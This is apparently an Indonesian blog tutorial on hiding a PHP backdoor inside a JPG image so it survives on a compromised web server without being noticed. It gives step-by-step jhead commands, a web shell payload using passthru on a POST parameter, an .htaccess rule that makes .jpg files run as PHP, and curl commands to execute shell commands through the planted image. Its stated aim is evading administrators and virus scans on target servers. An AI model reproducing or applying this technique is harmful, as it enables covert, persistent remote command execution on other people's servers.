Menyisipkan File Backdoor PHP ke File Gambar JPG

Ada banyak cara yang bisa dilakukan untuk membuat file backdoor atau akses pintu belakang yang kita buat di server target tetap awet alias tidak ketauan dan diterminate oleh admin webnya. Mulai dari menyisipkan file hidden uploader ke file yang sudah ada dll. Namun tentu saja trik tersebut masih ada kekurangan karena file tetap akan dianggap virus ketika server di scan.

Nah kali ini kita akan membahas cara menyisipkan file backdoor php ke file gambar. Dan tentu saja ini bisa kita lakukan dengan cara mendownload file yang ada di server, modifikasi data, upload kemabali. Dengan ini kemungkinan backdoor kita ditemukan mengecil ( kecuali webmasternya kelewat pro ) .
Nah seperti yang terlihat diatas, file tersebut saat diakses langsung akan terlihat seperti gambar normal pada umumnya, namun tentu file tersebut lebih istimewa bagi attacker yang menyisipkan backdoor ke file tersebut ๐Ÿ˜€ .
Untuk menyisipkan file backdoor ke file gambar seperti itu, kita bisa menggunakan Jhead. Gunakan Linux :p
install dengan command :

sudo apt-get install jhead

Selanjutnya kita siapkan file gambar yang akan kita sisipi backdoor.
Untuk tutorial kali ini saya menggunakan file gambar asuna.jpg yang saya simpan di ~/Desktop/bd/
Pertama, kita murnikan file gambar tadi dengan command

jhead -purejpg asuna.jpg

Ini untuk menghapus comment ataupun script yang mungkin disisipkan sebelumnya.
lalu masukkan command :

jhead -ce asuna.jpg

Selanjutnya kita masukkan script berikut ke dalam gambar :

<?php passthru($_POST[‘cmd’]); __halt_compiler();

basic vim diperlukan karena yang digunakan adalah vim editor :p
Setelah disave, harusnya script tadi sudah nyempil di comment.
Lalu kita upload gambar yang disipi backdoor tadi ke server target.
Jangan lupa di direktori yang sama tambahkan .htaccess dengan isi :

AddType application/x-httpd-php .jpg

Ini ditujukan agar sript php didalamnya tetap terbaca meski ekstensi file nya bukan php.
Nah, cara mengakses backdoor nya :

curl -d cmd=”command disini” webtarget/gambar.jpg

Contoh :

curl -d cmd=”uname -a; whoami; id” http://localhost/gambar/asuna.jpg

menarik bukan ?
Oke sekian tutorial kali ini, selamat berpuasa.
Shares

18 Comments

Leave a Reply